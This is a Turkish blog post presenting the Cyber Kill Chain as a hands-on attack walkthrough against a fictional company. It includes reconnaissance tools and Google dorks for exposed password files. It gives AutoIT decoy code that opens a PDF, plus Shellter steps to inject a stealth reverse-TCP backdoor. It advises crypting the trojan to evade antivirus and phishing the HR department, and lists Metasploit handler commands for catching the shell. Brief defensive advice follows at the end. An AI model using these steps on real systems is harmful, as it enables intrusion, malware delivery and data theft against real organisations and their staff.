Sızma Testi

Siber Ölüm Zinciri (Uygulamalı Olarak Anlatım)

Reklam

Siber Ölüm Zinciri’ni Anlamak!

İlk olarak askeriyede ortaya çıkmıştır, bir diğer adı da Cyber Kill Chain’dir.

Hedefi Belli Bir Saldırının Siber Ölüm Zinciri Aşamaları!

Saldırının sonuçlanmasına kadar geçen aşamalar bütünü Siber Ölüm Zincirini oluşturur. Peki bu evreler nelerdir? Bu evreler keşiften-Amaçlanan eyleme kadar geçen 7 aşamalı bir süreçtir.

Burda şöyle bir seneryoya bağlı kalarak ilerliycez. Köklü bir A.Ş. hakkında bir araştırma yapan siber güvenlik uzmanı rolünü üstlenicez.

1- Keşif (Reconnaissance)

Aktif ve pasif bilgilerin toplandığı en önemli aşamadır. Çünkü ilk aşama olarak bize sonuca varmamızı sağlayacak ve bizi bir yol çizmemizi sağlayan temel bilgileri sağlar.

Aktif Bilgi Toplama;

DNS SORGULARI:DIG veya NSLOOKUP araçları

DNS VERSİYON BİLGİSİ:DIG, NMAP ve NETCAT aracı

ALT ALAN ADLARINI KEŞFETME:HOST, DNSENUM, DNS-BRUTEFORCE ve DNSMAP vb araçlar

DNS ZONE TRANSFERİ:HOST, DNSENUM veya Windows ortamında çalışan NSLOOKUP araçları

DNS ENUMARATION: Kaba kuvvet teknikleri  ile alt domainlerin keşfedilmesi şeklide tanımlanabilir. DNSENUM aracı

SMTP RELAY Kontrolü: RelayScanner aracı

TRACEROUTE: Windows ortamında çalışan Tracert veya Linux ortamında çalışan Traceroute aracı

TCPTRACEROUTE:TCPTRACROUTE aracı

BANNER YAKALAMA:NETCAT, Telnet veya Nmap kullanılabilir.

Pasif Bilgi Toplama;

İnternet üzerindeki bilgi toplanacak kaynaklara kısaca bakacak olursak:

– Whois, DNS sorgularını yapabileceğimiz ve pasif bilgi toplamak için kullanılan özel web sayfaları

http://www.robtex.com

http://www.ripe.net

http://www.arin.net

http://www.mxtoolbox.com

http://www.dnsstuff.com (Ticari)

http://www.netcraft.com/

http://www.centralops.net

– Arşiv Siteleri ( archieve.org )

http://web.archive.org

– Arama motorları (Google, Bing, Yahoo vs.)

Google ‘da alan adı(Domain Arama):
site:xyz.com

Google ‘da dosya arama
Filetype : xls

Google ‘da bir web sitesi içinde xls dosyası arama
site:xyz.com Filetype:xls

Google ‘de başlık bilgisi ile index dizininde gezinme
intitle:index of

Google ‘da web sunucusu platform bilgisi alma
intitle:index.of “server at”

Google ‘da web sayfalarının admin sayfalarını keşletme
intitle:index.of inurl:“/admin/”

Google ‘da parola dosyaları arama
intitle:index.of passwd
intitle:”Index.of..etc” passwd
intitle:index.of pwd.db passwd
intitle:index.of ws_ftp.ini
intitle:index.of people.lst
intitle:index.of passlist

Google ‘da e-mail adresi toplama
mail:@xyz.com

Google ‘da belli web platformları arama (IIS, Apache Vs.)
Apache/1.3.27 Server at
Microsoft-IIS/5.0 server at

Goolik ve SiteDigger araçları

Bing üzerinden “ip: XYZ.XYZ.XYZ.XYZ”

– Sosyal paylaşım ağları (Twitter, Facebook, Linkedin, Friendfeed vs.)

www.linkedin.com ==> İş dünyası ve kişiler hakkında çok detaylı bilgiler elde edilebilir

www.facebook.com ==> Kişisel bilgi toplamak için bilinen en etkili ağ

www.twitter.com ==> Hem kişisel hem de kurumsal bir çok bilgiyi barındır.

www.friendfeed ==> Hem kişisel hem de kurumsal bir çok bilgiyi barındır.

– Bloglar ve tartışma forumları

“xyz holding + forum” veya “xyz holding + blog” yazıp detaylı aramalar yapılabilir.

– Kariyer siteleri

www.pipl.com veya www.bestpeoplesearch.com üzerinden kişisel bilgiler aranabilir.

Ve bunun gibi bir çok aktif ve pasif bilgi toplama araçları ile veri elde ederiz.

2- Silahlanma (Weaponization)

Keşiften elde edilen değerli bilgiler ışığında zararlı yazılımın oluşturulması veya geliştirilmesi aşamasıdır.

Seneryoya göre yaptığımız incelemeler doğrultusunda bir bilgisayarın eski sürüm olduğunu ve bu bilgisayarda Microsoft Office 2010 yada pdf uygulamalarının sürümlerinin düşük olduğunu öğrendik. Bu ağda en zayıf halkanın insan kaynakları departmanı olarak belirledik. Ona göre bir trojen hazırlayıp gerekli dökümanı yemleme taktiği ile e-posta aracılığı ile yediricez.

Bunun için AutoIT aracını kullanıcaz.

Kurulumu;

Windows’a normal indirmek yeterli ama Linux ile çalıştırmak için wine uygulamasına ihtiyaç vardır.

İhtiyacımız olan AutoIT Scirpt Kodlarımızın Bulunduğu .au3 dosyamız ve iconumuzun olduğu .ico dosyamız.

PourLEa.au3 Kodu içinde;

#include <StaticConstants.au3>

#include <WindowsConstants.au3>

$sFile=_DownloadFile(“https://www.unicef.org/media/60806/file/SOWC-2019.pdf”)

shellExecute($sFile)

Func _DownloadFile($sURL)

               Local $hDownload, $sFile

               $sFile = StringRegExpReplace($sURL, “^.*/,””)

               $sDirectory = @TempDir & $sFile

               $hDownload = InetGet($sURL,$sDirectory, 17 , 1)

               InetClose($hDownload)

               Return $sDirectory

EndFunc ;==>_GetURLImage

veya şu şekilde ;

$FileURL = "https://www.unicef.org/media/60806/file/SOWC-2019.pdf"
$FileName = @TempDir & "SOWC-2019.pdf"
$FileSize = InetGetSize($FileURL)

InetGet($FileURL,$FileName,0,1)

ProgressOn("","")
While @InetGetActive
    $Percentage = @InetGetBytesRead * 100 / $FileSize
    ProgressSet($Percentage,"Downloaded " & @InetGetBytesRead & " of " & $FileSize & " bytes","Downloading " & $FileName)
    Sleep(250)
Wend
ProgressOff()

ShellExecute (@TempDir & "SOWC-2019.pdf")

Yapılabilir.

Şimdi geldik AutoIT Script to EXE Converter uygulammızı açıyoruz.

.au3 dosyamızın konumunu ve .ico konumumuzu seçiyoruz.

Böylece PourLEa.exe Dosyamızı Oluşturduk.

Şimdi Geldi Pdf açacak bu .exe uygulamasının içine arka kapı açmaya bunun içinde Shellter Uygulamamızı Kullanıyoruz.

Kurulumu;

Console açıp "apt-get install shellter" yazıyoruz.

Consola "shellter" yazıp uygulamamızı açıyoruz.

Sırasıyla Choose Operation Mode - A(Auto) yazıyoruz.

PE Target: Hedef .exe dosyası  dönüştürdüğümüz .exe dosyasının dizin yolunu yazıyoruz.

Enable Stealth Mode?  Gizli mod etkinleştirilsin mi? Sorusuna Yes anlamında Y diyoruz.

Geldik Payload seçmeye bizim Payloadımız; 5.seçenek olan Shell_Reverse_TCP

Dinlemeye alıcağımız için kendi ip adresimizi ve hangi porttan dinliyceğimizi belirliyoruz.

Ve Başarılı Bir şekilde Uygulamamızın içine bir Arka Kapı yerleştirdik.

3- İletme (Delivery)

Dediğimiz gibi belirlediğimiz hedefler doğrultusunda sosyal mühendisliğimizin de işin içine girdiği oltalama tekniği ile bir diğer adı olarak Spear Phishing olarak adlandırılan, hedef temelli saldırılardır. Silahımızı ateşleyebileceğimiz bir zemin diyebiliriz.

Not ; Kullanıcıların kişisel bilgileri ifşa etmelerine ve ağın tehlikeye girmesine, veri kaybına ve finansal kayıplara neden olan eylemlerdir.

Bu Aşamaya geçmeden Önce oluşturduğumuz trojeni bir fudlama crypter işlemi yapıyoruz. Böylece antivirüs programlarının yakalaması imkansız Hale geliyor.

İnandırıcı olması açısından kurumsal bir e-posta üzerinden gerekli deparmana veya kişilere atarsanız elbet biri indirip açacaktır.

4- Sömürme (Exploitation)

Belirletilen Sistem zafiyetlerinden yararlanma aşamasıdır.

Sırasıyla;

Consola "msfconsole" yazıyoruz.Metasploit aracımız açıldı.

Şimdi "use exploit/multi/handler" diyip ayarlarımızı yapıyoruz.

"set payload Windows/Shell/reverse_tcp"

"set lhost kendi ip adresin"

"set lport dinlemeye aldığımız port"

"run" diyip artık attığımız maildeki pdf,exel,docx formatlarından herhangi birinin indirip açmasını bekliyoruz.

5- yükleme (Installation)

Sistem zafiyetlerinden yararlanılarak sömürdüğümüz hedef’e geliştirilen zararlı yazılımın yüklenmesi aşamasıdır.

Gerekli Departmandan biri veya birileri oltalama veya yemleme taktiğimize takıldı. Bilgisayarına indirdi.

Ve Hiçbir antivirüs tespit etmedi. Sonra Kurban bunu açacak ve karşısına autoıt ile kodladığımız adresden .pdf indirip açacak aynı zamanda arkada bizim bizim arka kapımız açılmış olucak.

6-Komuta ve Kontrol(Command & Control, C2)

Bu aşama C2 (Command and Control) olarak da adlandırılır. Bu aşamada Tamamen hedef sisteme sızmış durumda oluyoruz. Ve bir yönetici yetkilerine sahip olarak dosyaların manipülasyonu (silme, ekleme, değiştirme) ve bunun yanında arkada bıraktığımız izleri temizlediğimiz aşamadır.

7- Hedeflenen Eylem(Actions On Objectives)

Veri çalma, değiştirme ve silme, bulunduğu yerden başka bir sisteme sıçrama, gibi eylemler örnek gösterilebilir. Bu aşama tamamen kurguladığımız senaryoya bağlı gerçekleştirdiğimiz olaya uygun eylemlerdir. İstediğimiz veriler Buna göre şekillenir.

Üste de Gördüğünüz gibi Kurbanın bilgisayarı ile Bağlantı kurduk. Böylece arkada bıraktığımız izleri silebilir. Amacımıza göre eylemler gerçekleştirebiliriz. Belki de çok büyük zararlar verilebilir. Bunun için gerek kendi kişisel hesaplarınız olsun gerek kurumsal olarak şirketin verileri olsun gerekse müşterileriniz hakkındaki bilgileri korumak istiyorsanız. Lütfen Güvenli olmayan dosyaları indirip açmayalım. Uzantıları gözükmüyorsa Windows ayarlarından uzantıları gösteri açalım. Bu yöntemler çok basit gibi gözükse de bu taktiklerle on binlerce kişi saldırganın ağına düşebiliyor. Sisteminizi her zaman güncel tutmanızda ve klasörlerinizi yedekliyebiliceğiniz bir sisteme geçmenizde fayda var.

Teknik, Taktik ve Prosedürler (TTP)

Düşmanı anlamak ve onunla savaşmak için saldırganın kullandığı Teknikleri, Taktikleri ve Prosedürleri (TTP) anlamak gerekir.

Taktik

Hedef Sistemlerine yönelik geliştirilen kritik bilgilerin toplanmasıdır.

Teknik

Yeteneklerimiz ve becerilerimizin sergilendiği toplanılan bilgilerin işlenmesidir.

Prosedürler

Sistemden ziyade kişiler hakkında bilgilerin toplandığı evredir.

Düşman Davranışlarını Tanıma

Bilgisayar korsanlarının kim olduğunu ve ne istediklerini anlamak, ağ güvenliği ihlallerinin etkisini en aza indirmenin en etkili yoludur.

Neden İhtiyaç Duyuyoruz?

Siber saldırılara karşı önlem alabilmek için saldırı evrelerini iyi bilmek gerekmektedir. Cyber Kill Chain gibi modeller sayesinde bir siber saldırının öncesinde eksik noktalar tespit edilebilir, saldırı anında saldırının aşamasına göre müdahale yöntemine karar verilebilir ve saldırı sonrasında kurumun bu saldırıdan ne ölçüde etkilendiğinin risk analizi yapılabilir.

Etiketler
Daha Fazla Göster

Eren Öztürk

Sayısal düşünme yeteneği yüksek, sayılarla uğraşmaktan sıkılmayan, sosyal olaylara ilgili, Bir konuyu ayrıntılarına inerek, nedenlerini bulmaya yönelik çalışmalardan hoşlanan, değişik görüşlere ve yeniliklere açık, Bir işi planlayabilme ve uygulamaya koyabilme, uzak görüşlü olma gibi özelliklere sahip olduğumu düşünüyorum.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir